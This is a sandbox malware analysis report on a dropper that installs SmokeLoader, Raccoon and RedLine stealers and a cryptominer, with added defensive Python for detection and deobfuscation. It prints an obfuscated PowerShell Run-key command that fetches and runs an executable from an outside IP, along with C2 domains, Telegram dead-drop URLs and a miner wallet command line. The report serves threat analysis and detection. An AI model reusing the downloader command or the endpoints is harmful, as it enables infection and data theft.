Analysis
-
max time kernel: 150s
max time network: 150s
platform: windows10_x64
resource: win10v20210410
submitted: 12-08-2021 00:43
-
Static task: static1
Behavioral task: behavioral1
  Sample: 6c0aa25e7a4fe66a0cd648fcd8728b52.exe
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: 6c0aa25e7a4fe66a0cd648fcd8728b52.exe
  Resource: win10v20210410
General
-
Target: 6c0aa25e7a4fe66a0cd648fcd8728b52.exe
Size: 319KB
MD5: 6c0aa25e7a4fe66a0cd648fcd8728b52
SHA1: 88bca55f776aaf296e629adac6b5789b7935aa11
SHA256: 008e443855d5e3c364f847c31e513bb48589e1cdf1a3bc622367f64062258e8e
SHA512: 36143c741fdae41ef4652e76ee449f01beef47abecdee979ca7205bc392644b571abea30479c80d3fbf4c9740b5865314196dbb59688b0a9182db709a7897cbd
Malware Config
Extracted
  http://91.241.19.52/Api/GetFile2
Extracted
  Family: smokeloader
  Version: 2020
  C2:
    http://readinglistforjuly1.xyz/
    http://readinglistforjuly2.xyz/
    http://readinglistforjuly3.xyz/
    http://readinglistforjuly4.xyz/
    http://readinglistforjuly5.xyz/
    http://readinglistforjuly6.xyz/
    http://readinglistforjuly7.xyz/
    http://readinglistforjuly8.xyz/
    http://readinglistforjuly9.xyz/
    http://readinglistforjuly10.xyz/
    http://readinglistforjuly1.site/
    http://readinglistforjuly2.site/
    http://readinglistforjuly3.site/
    http://readinglistforjuly4.site/
    http://readinglistforjuly5.site/
    http://readinglistforjuly6.site/
    http://readinglistforjuly7.site/
    http://readinglistforjuly8.site/
    http://readinglistforjuly9.site/
    http://readinglistforjuly10.site/
    http://readinglistforjuly1.club/
    http://readinglistforjuly2.club/
    http://readinglistforjuly3.club/
    http://readinglistforjuly4.club/
    http://readinglistforjuly5.club/
    http://readinglistforjuly6.club/
    http://readinglistforjuly7.club/
    http://readinglistforjuly8.club/
    http://readinglistforjuly9.club/
    http://readinglistforjuly10.club/
Extracted
  Family: raccoon
  2ca2376c561d1af7f8b9e6f3256b06220a3db187
  url4cnc: https://telete.in/johnyes13
Extracted
  Family: redline
  Botnet: @gasfer_dark
  C2: 207.154.240.76:80
Extracted
  Family: raccoon
  cd8dc1031358b1aec55cc6bc447df1018b068607
  url4cnc: https://telete.in/jagressor_kz
Extracted
  Family: raccoon
  471c70de3b4f9e4d493e418d1f60a90659057de0
  url4cnc: https://telete.in/p1rosto100xx
Note on url4cnc: Raccoon does not carry its C2 address directly; it fetches the public page of a Telegram channel (here via the telete.in web mirror) and reads the C2 URL out of the channel description, so the telete.in URLs are dead-drop resolvers, not C2 servers. Three distinct Raccoon configurations were extracted from this one run, matching the three family_raccoon memory hits under Signatures.
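The extracted configuration is the most durable part of a report like this, so it is worth turning it into network detection mechanically. The following Python is an added example, not part of the report or of any tool the sandbox uses: it takes the SmokeLoader C2 domains, the RedLine ip:port and the loader URL listed above and emits Suricata rules for them. The sid range is an assumption of the example; the telete.in resolvers are deliberately left out because the host is a shared, legitimate mirror and a rule on it would fire on unrelated traffic.

```python
"""Turn the extracted C2 endpoints of this report into Suricata rules (added example)."""
from urllib.parse import urlparse

# Endpoints copied from the Malware Config section above.
SMOKELOADER_C2 = [
    f"http://readinglistforjuly{i}.{tld}/"
    for tld in ("xyz", "site", "club")
    for i in range(1, 11)
]
REDLINE_C2 = ["207.154.240.76:80"]            # RedLine "C2" field, ip:port
LOADER_URLS = ["http://91.241.19.52/Api/GetFile2"]

BASE_SID = 9100000   # assumption: a private sid range reserved for these rules


def c2_domains():
    """Unique SmokeLoader C2 hostnames, sorted so that sids are stable between runs."""
    return sorted({urlparse(u).hostname for u in SMOKELOADER_C2})


def build_rules(base_sid=BASE_SID):
    rules = []
    sid = base_sid

    def emit(rule_body):
        nonlocal sid
        rules.append(f"{rule_body} sid:{sid}; rev:1;)")
        sid += 1

    # DNS lookups of any SmokeLoader C2 domain (the dns.query buffer is lowercase-normalised).
    for host in c2_domains():
        emit(f'alert dns $HOME_NET any -> any any (msg:"SmokeLoader C2 domain {host}"; '
             f'dns.query; content:"{host}"; endswith;')
    # RedLine talks plain TCP to the extracted ip:port.
    for endpoint in REDLINE_C2:
        ip, port = endpoint.split(":")
        emit(f'alert tcp $HOME_NET any -> {ip} {port} (msg:"RedLine C2 {endpoint}"; flow:to_server;')
    # Loader host: any traffic to the IP, plus the specific download URI seen in the config.
    for url in LOADER_URLS:
        p = urlparse(url)
        emit(f'alert ip $HOME_NET any -> {p.hostname} any (msg:"Loader host {p.hostname}";')
        emit(f'alert http $HOME_NET any -> any any (msg:"Loader download URI {p.path}"; '
             f'flow:to_server; http.uri; content:"{p.path}";')
    return rules


if __name__ == "__main__":
    print("\n".join(build_rules()))
```

The IP-based rules age fastest: 91.241.19.52 also serves the second-stage Runtimebroker.exe referenced by the Run key further down, but a bare hosting IP can be reassigned, so keep the domain and URI rules longer than the ip rules.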
Signatures
-
Process spawned unexpected child process (6 IoCs)
This typically indicates the parent process was compromised via an exploit or macro. Here the parent is the WMI provider host: a process whose parent is wmiprvse.exe was normally created through a WMI Win32_Process call, so this points at a script or binary using WMI to launch schtasks.exe rather than at an exploit of WMI itself. The six children are the schtasks.exe instances listed under "Creates scheduled task(s)" below.
Processes:
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process: schtasks.exe (pid 4800, parent pid 4252)
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process: schtasks.exe (pid 4944, parent pid 4252)
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process: schtasks.exe (pid 188, parent pid 4252)
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process: schtasks.exe (pid 2436, parent pid 4252)
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process: schtasks.exe (pid 2992, parent pid 4252)
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process: schtasks.exe (pid 5096, parent pid 4252)
-
Raccoon Stealer Payload (4 IoCs)
Processes (memory dumps matched by the family_raccoon YARA rule; pid to image per "Executes dropped EXE" below):
  behavioral2/memory/3092-177-0x00000000049E0000-0x0000000004A73000-memory.dmp  (pid 3092 = 942B.exe)
  behavioral2/memory/3092-178-0x0000000000400000-0x0000000002CB1000-memory.dmp  (pid 3092 = 942B.exe)
  behavioral2/memory/2204-196-0x0000000000400000-0x0000000000946000-memory.dmp  (pid 2204 = 9B60.exe)
  behavioral2/memory/4312-542-0x0000000000400000-0x0000000000495000-memory.dmp  (pid 4312 = second 8EFA.exe instance, the hollowed child)
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload (4 IoCs)
Processes (files matched by the family_redline YARA rule):
  C:\Users\Admin\AppData\Local\Temp\8563.exe  (matched twice)
  C:\Users\Admin\AppData\Local\Temp\A0B0.exe  (matched twice)
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess (1 IoCs)
Processes:
  PID 4064 (WerFault.exe) created 3092 (942B.exe)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile  (alert listed twice in the report)
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)
-
Blocklisted process makes network request (1 IoCs)
Processes:
  powershell.exe (pid 1108), network flow 36
-
Downloads MZ/PE file
-
Executes dropped EXE (64 IoCs)
Processes (pid image):
  1076 7CC7.exe, 2680 7CC7.tmp, 4016 7CC7.exe, 2740 7CC7.tmp, 572 8563.exe, 2044 898B.exe, 2724 8EFA.exe, 3588 fsucenter.exe, 3092 942B.exe, 900 Runtimebroker.exe, 2204 9B60.exe, 2644 A0B0.exe, 4312 8EFA.exe, 4740 install.exe, 4784 install.exe, 4792 HostData.exe, 4124 WerFault.exe
  Database.exe, 47 instances: pids 4640, 4700, 4816, 4888, 4940, 5076, 2608, 5116, 4168, 4320, 1800, 4460, 1068, 4204, 3676, 4416, 2032, 3152, 2092, 1112, 4604, 1516, 1124, 2044, 1108, 4696, 4444, 4752, 4916, 4904, 3412, 4088, 1196, 1820, 2792, 1800, 2188, 5060, 4148, 4204, 408, 4372, 4432, 2932, 468, 4008, 2092 (pids 1800, 4204 and 2092 are listed twice)
-
Checks BIOS information in registry (2 TTPs, 64 IoCs)
BIOS information is often read in order to detect sandboxing environments: hypervisor names such as VBOX or VMware in these strings identify a virtual machine, so a sandbox that does not patch them is trivially fingerprinted.
Processes: Database.exe (62 entries), 8563.exe (2 entries)
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
  (all 64 entries query one of these two values; 8563.exe reads each once, the rest come from the Database.exe instances)
-
Deletes itself (1 IoCs)
Processes:
  pid 3008 (image name not recorded in the report)
-
Drops startup file (1 IoCs)
Processes:
  File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk  (Runtimebroker.exe)
-
Loads dropped DLL (6 IoCs)
Processes:
  3588 fsucenter.exe (1 entry), 2204 9B60.exe (5 entries)
-
Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
-
(signature title missing from the extracted page; matches of the themida packer YARA rule)
Processes:
  C:\Users\Admin\AppData\Local\Temp\8563.exe  yara: themida (matched twice)
  behavioral2/memory/572-142-0x0000000000EE0000-0x0000000000EE1000-memory.dmp  yara: themida (pid 572 = 8563.exe)
-
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
-
Adds Run key to start application (2 TTPs, 7 IoCs)
Processes: install.exe, powershell.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\PerfLogs\\OfficeClickToRun.exe\""  (install.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"  (powershell.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\odt\\explorer.exe\""  (install.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost = "\"C:\\PerfLogs\\ShellExperienceHost.exe\""  (install.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\8563 = "\"C:\\Program Files (x86)\\Google\\Temp\\8563.exe\""  (install.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WerFault = "\"C:\\Windows\\SysWOW64\\WimBootCompress\\WerFault.exe\""  (install.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Default\\Recent\\csrss.exe\""  (install.exe)
The "Sound device" value is a per-user PowerShell downloader: the concatenated fragments resolve to http://91.241.19.52/Runtimebroker.exe, saved as %TEMP%\Vpnm.exe and started, so the same host that serves the extracted /Api/GetFile2 URL also re-delivers Runtimebroker.exe at every logon. The six install.exe values persist copies under names borrowed from Windows components (csrss, WerFault, ShellExperienceHost, explorer) in directories where those names do not belong.
-
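The "Sound device" Run value above splits its URL and drop path into single-quoted fragments joined with '+', so neither string appears contiguously in the registry or on a command line. The following Python is an added example, not part of the report or of any tool it names; it folds those concatenations back together and pulls out the indicators. The command text is copied from the Run value as the report displays it (backslashes shown doubled), and %TEMP% is used as a stand-in for $env:TEMP.

```python
import re

# The "Sound device" Run value, copied as the report displays it (backslashes doubled).
RUN_KEY_VALUE = (
    "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient)"
    ".DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),"
    r"($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"
)

# A parenthesised chain of single-quoted literals and $env:NAME references joined by '+'.
PIECE = r"(?:'[^']*'|\$env:\w+)"
CONCAT_EXPR = re.compile(r"\(\s*" + PIECE + r"(?:\s*\+\s*" + PIECE + r")+\s*\)")
PART = re.compile(r"'([^']*)'|\$env:(\w+)")


def fold_concat(expr: str) -> str:
    """Join the pieces of one concatenation expression into a plain string."""
    out = []
    for literal, env_name in PART.findall(expr):
        out.append(f"%{env_name.upper()}%" if env_name else literal)  # $env:TEMP -> %TEMP%
    return "".join(out).replace("\\\\", "\\")   # undo the report's display escaping


def deobfuscate(cmd: str) -> str:
    """Replace every string-concatenation expression in cmd with its folded value."""
    return CONCAT_EXPR.sub(lambda m: fold_concat(m.group(0)), cmd)


def extract_iocs(cmd: str) -> dict:
    """Fold the command and report what it downloads, where it writes it and how it runs."""
    plain = deobfuscate(cmd)
    return {
        "plain": plain,
        "urls": re.findall(r"https?://[^\s'\"(),;]+", plain),
        "drop_paths": sorted(set(re.findall(r"%TEMP%\\[^\s'\"(),;]+", plain))),
        # "-WinD HIDDen" is PowerShell's -WindowStyle Hidden, abbreviated and case-mangled
        "hidden_window": re.search(r"-win\w*\s+hid", plain, re.I) is not None,
        "downloader": "DownloadFile" in plain,
    }


if __name__ == "__main__":
    for key, value in extract_iocs(RUN_KEY_VALUE).items():
        print(f"{key}: {value}")
```

The folding only handles the one trick this sample uses (literal concatenation plus an environment variable); format operators, char-code arrays and Base64 -EncodedCommand payloads need their own passes. Matching on the abbreviated, case-mangled parameters (-WinD, -CoMmAN) rather than on the full spelling is what keeps a detection for this launcher from being trivially evaded.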
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
(signature title missing from the extracted page; all entries read the UAC policy value)
Processes: Database.exe (every entry but one), 8563.exe (one entry)
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
-
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
-
Drops file in System32 directory (2 IoCs)
Processes:
  File created C:\Windows\SysWOW64\WimBootCompress\WerFault.exe  (install.exe)
  File created C:\Windows\SysWOW64\WimBootCompress\ee201eac4591f0b16735de891f3d31be299085b8  (install.exe)
-
Suspicious use of NtSetInformationThreadHideFromDebugger (64 IoCs)
Processes (pid image):
  572 8563.exe (1 call)
  Database.exe, 3 calls each: pids 4640, 4700, 4816, 4888, 4940, 5076, 2608, 5116, 4168, 4320, 1800, 4460, 1068, 4204, 3676, 4416, 2032, 3152, 2092, 1112, 4604
-
Suspicious use of SetThreadContext (3 IoCs)
Processes:
  PID 3972 set thread context of 2400  (6c0aa25e7a4fe66a0cd648fcd8728b52.exe -> 6c0aa25e7a4fe66a0cd648fcd8728b52.exe)
  PID 2724 set thread context of 4312  (8EFA.exe -> 8EFA.exe)
  PID 4740 set thread context of 4784  (install.exe -> install.exe)
In all three cases the target is a second instance of the caller's own image, and the WriteProcessMemory list below shows 3972 writing into 2400 six times before this call: the classic process-hollowing (RunPE) sequence, in which a suspended copy of the binary is started, its image is overwritten with the real payload, and the main thread's context is pointed at the new entry point. The family YARA hits on pid 4312 (Raccoon) show what the hollowed 8EFA.exe actually runs.
-
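The process-tree signatures in this report (the wmiprvse.exe -> schtasks.exe spawns, the same-image SetThreadContext calls and the WriteProcessMemory entries) are all flat rows in one of two shapes, and the checks an analyst applies to them are simple enough to script. The following Python is an added example, not part of the report or of the sandbox: it parses constructed copies of rows from those three sections and applies three rules, a LOLBin launched under wmiprvse.exe, a SetThreadContext whose target is a second instance of the caller's own image, and a memory write followed by a thread-context change on the same target. The list of children that should never appear under wmiprvse.exe is an assumption of the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class ProcEvent:
    kind: str                  # "spawn", "write_memory" or "set_thread_context"
    src_pid: int
    src_image: Optional[str]   # None when the report omits the image (as it does for pid 3008)
    dst_pid: int
    dst_image: str


# Row shapes used by the report: "pid pid_target process" for spawns and
# "PID <src> ... <dst> <src> <src image> <dst image>" for memory/thread operations.
SPAWN = re.compile(r"^Parent (\S+) is not expected to spawn this process (\d+) (\d+) (\S+)$")
SETCTX = re.compile(r"^PID (\d+) set thread context of (\d+) \d+ (\S+) (\S+)$")
WRITE = re.compile(r"^PID (\d+) wrote to memory of (\d+) \d+ (\S+)(?: (\S+))?$")


def parse_row(row: str) -> Optional[ProcEvent]:
    """Convert one IoC row into a ProcEvent; None for rows of another shape."""
    m = SPAWN.match(row)
    if m:
        parent_image, child_pid, parent_pid, child_image = m.groups()
        return ProcEvent("spawn", int(parent_pid), parent_image, int(child_pid), child_image)
    m = SETCTX.match(row)
    if m:
        src, dst, src_image, dst_image = m.groups()
        return ProcEvent("set_thread_context", int(src), src_image, int(dst), dst_image)
    m = WRITE.match(row)
    if m:
        src, dst, first, second = m.groups()
        # Two trailing names are "<src image> <dst image>"; a single name is the target's
        # (the report omits the source image for pid 3008).
        src_image, dst_image = (first, second) if second else (None, first)
        return ProcEvent("write_memory", int(src), src_image, int(dst), dst_image)
    return None


def basename(path: Optional[str]) -> str:
    return (path or "").replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Assumption of this example (not from the report): children a WMI provider host
# has no business launching directly.
UNEXPECTED_CHILDREN = {
    "wmiprvse.exe": {"schtasks.exe", "cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe"},
}


def detect(events: List[ProcEvent]) -> List[str]:
    """Apply the three rules and return one alert string per hit, in event order."""
    alerts: List[str] = []
    written = set()   # target pids that have already received a WriteProcessMemory
    for e in events:
        if e.kind == "spawn":
            bad = UNEXPECTED_CHILDREN.get(basename(e.src_image), set())
            if basename(e.dst_image) in bad:
                alerts.append(f"unexpected child: {basename(e.src_image)} ({e.src_pid}) "
                              f"-> {e.dst_image} ({e.dst_pid})")
        elif e.kind == "write_memory":
            written.add(e.dst_pid)
        elif e.kind == "set_thread_context":
            if e.src_image and basename(e.src_image) == basename(e.dst_image) and e.src_pid != e.dst_pid:
                alerts.append(f"hollowing candidate: {e.src_pid} re-launched {e.dst_image} "
                              f"as {e.dst_pid} and reset its thread context")
            if e.dst_pid in written:
                alerts.append(f"injection chain: {e.src_pid} wrote into {e.dst_pid} "
                              f"and then set its thread context")
    return alerts


# Constructed copies of rows from this report.
SAMPLE_ROWS = [
    r"Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4800 4252 schtasks.exe",
    "PID 3972 wrote to memory of 2400 3972 6c0aa25e7a4fe66a0cd648fcd8728b52.exe 6c0aa25e7a4fe66a0cd648fcd8728b52.exe",
    "PID 3972 set thread context of 2400 3972 6c0aa25e7a4fe66a0cd648fcd8728b52.exe 6c0aa25e7a4fe66a0cd648fcd8728b52.exe",
    "PID 3008 wrote to memory of 1076 3008 7CC7.exe",
    "PID 2724 set thread context of 4312 2724 8EFA.exe 8EFA.exe",
    "PID 4740 set thread context of 4784 4740 install.exe install.exe",
    "PID 900 wrote to memory of 2448 900 Runtimebroker.exe powershell.exe",
]


def analyse(rows: List[str]) -> List[str]:
    events = [ev for ev in map(parse_row, rows) if ev is not None]
    return detect(events)


if __name__ == "__main__":
    for line in analyse(SAMPLE_ROWS):
        print(line)
```

On the sample rows the same-image rule fires for all three SetThreadContext entries while the write-then-context rule fires only for 3972 -> 2400, because the report's 64-entry WriteProcessMemory list is truncated before the writes into 4312 and 4784; a truncated IoC list is a reason to keep the weaker single-event rule alongside the sequence rule rather than replace it.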
Drops file in Program Files directory (2 IoCs)
Processes:
  File created C:\Program Files (x86)\Google\Temp\8563.exe  (install.exe)
  File created C:\Program Files (x86)\Google\Temp\ec5956f2652b530403e40f8f782c71845288152c  (install.exe)
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash (5 IoCs)
Processes:
  WerFault.exe pids 2112, 2784, 3764, 3224 and 4064, each handling a crash of 942B.exe (pid 3092)
-
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes: 6c0aa25e7a4fe66a0cd648fcd8728b52.exe
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
  Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
  Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
-
Creates scheduled task(s) (1 TTPs, 6 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  schtasks.exe pids 4800, 4944, 188, 2436, 2992, 5096 (the same six instances flagged above as unexpected children of wmiprvse.exe)
-
Modifies registry class (2 IoCs)
Processes:
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance
  Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance
-
(signature title missing from the extracted page; the entries modify the machine certificate store)
Processes: fsucenter.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349
  Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob omitted from the report)
Entries under AuthRoot\Certificates are also written by Windows' automatic root-certificate update when a signature chain needs a root that is not yet cached locally, so this is frequently a side effect of verifying a signed binary rather than a deliberate change to the trust store; compare the thumbprint with the Microsoft Trusted Root Program list before treating it as a planted root.
-
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes:
  2400 6c0aa25e7a4fe66a0cd648fcd8728b52.exe (2 entries)
  pid 3008 (62 entries; image name not recorded in the report)
-
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes:
  pid 3008
-
Suspicious behavior: MapViewOfSection (19 IoCs)
Processes:
  2400 6c0aa25e7a4fe66a0cd648fcd8728b52.exe (1 entry)
  pid 3008 (18 entries)
-
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: 8563.exe, WerFault.exe, A0B0.exe, powershell.exe, explorer.exe, pid 3008
  pid 3008: Token: SeShutdownPrivilege and Token: SeCreatePagefilePrivilege, requested alternately throughout the run (54 entries)
  Token: SeDebugPrivilege 572 8563.exe
  Token: SeRestorePrivilege 2112 WerFault.exe
  Token: SeBackupPrivilege 2112 WerFault.exe
  Token: SeDebugPrivilege 2112 WerFault.exe
  Token: SeDebugPrivilege 2784 WerFault.exe
  Token: SeDebugPrivilege 3764 WerFault.exe
  Token: SeDebugPrivilege 2644 A0B0.exe
  Token: SeDebugPrivilege 2448 powershell.exe
  Token: SeDebugPrivilege 3224 explorer.exe
  Token: SeDebugPrivilege 4064 WerFault.exe
-
Suspicious use of FindShellTrayWindow (1 IoCs)
Processes:
  2740 7CC7.tmp
-
Suspicious use of UnmapMainImage (1 IoCs)
Processes:
  pid 3008
-
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (source pid image -> target pid image, number of entries; the report gives no image name for pid 3008):
  3972 6c0aa25e7a4fe66a0cd648fcd8728b52.exe -> 2400 6c0aa25e7a4fe66a0cd648fcd8728b52.exe (6)
  3008 -> 1076 7CC7.exe (3)
  1076 7CC7.exe -> 2680 7CC7.tmp (3)
  2680 7CC7.tmp -> 4016 7CC7.exe (3)
  4016 7CC7.exe -> 2740 7CC7.tmp (3)
  3008 -> 572 8563.exe (3)
  3008 -> 2044 898B.exe (3)
  3008 -> 2724 8EFA.exe (3)
  2740 7CC7.tmp -> 3588 fsucenter.exe (3)
  3008 -> 3092 942B.exe (3)
  2044 898B.exe -> 900 Runtimebroker.exe (3)
  3008 -> 2204 9B60.exe (3)
  3008 -> 2644 A0B0.exe (3)
  900 Runtimebroker.exe -> 2448 powershell.exe (3)
  3008 -> 3412 explorer.exe (4)
  3008 -> 2792 explorer.exe (3)
  3008 -> 2980 explorer.exe (4)
  3008 -> 1300 explorer.exe (3)
  3008 -> 3224 explorer.exe (4)
  900 Runtimebroker.exe -> 1108 powershell.exe (1)
Processes
-
C:\Users\Admin\AppData\Local\Temp\6c0aa25e7a4fe66a0cd648fcd8728b52.exe (level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\6c0aa25e7a4fe66a0cd648fcd8728b52.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory

C:\Users\Admin\AppData\Local\Temp\6c0aa25e7a4fe66a0cd648fcd8728b52.exe (level 2)
  Command line: "C:\Users\Admin\AppData\Local\Temp\6c0aa25e7a4fe66a0cd648fcd8728b52.exe"
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Local\Temp\7CC7.exe (level 1)
  Command line: C:\Users\Admin\AppData\Local\Temp\7CC7.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory

C:\Users\Admin\AppData\Local\Temp\is-3PUS4.tmp\7CC7.tmp (level 2)
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-3PUS4.tmp\7CC7.tmp" /SL5="$6002E,4193427,831488,C:\Users\Admin\AppData\Local\Temp\7CC7.exe"
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory

C:\Users\Admin\AppData\Local\Temp\7CC7.exe (level 3)
  Command line: "C:\Users\Admin\AppData\Local\Temp\7CC7.exe" /VERYSILENT
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory

C:\Users\Admin\AppData\Local\Temp\is-5UNKH.tmp\7CC7.tmp (level 4)
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-5UNKH.tmp\7CC7.tmp" /SL5="$80062,4193427,831488,C:\Users\Admin\AppData\Local\Temp\7CC7.exe" /VERYSILENT
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory

C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe (level 5)
  Command line: "C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies system certificate store

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\install.exe (level 6)
  Command line: "C:\ProgramData\Data\install.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext

C:\ProgramData\Data\install.exe (level 7)
  Command line: "C:\ProgramData\Data\install.exe"
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  - Drops file in Program Files directory

C:\Windows\SysWOW64\WimBootCompress\WerFault.exe (level 8)
  Command line: "C:\Windows\SysWOW64\WimBootCompress\WerFault.exe"
  - Executes dropped EXE

C:\ProgramData\Systemd\HostData.exe (level 6)
  Command line: NULL
  - Executes dropped EXE

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
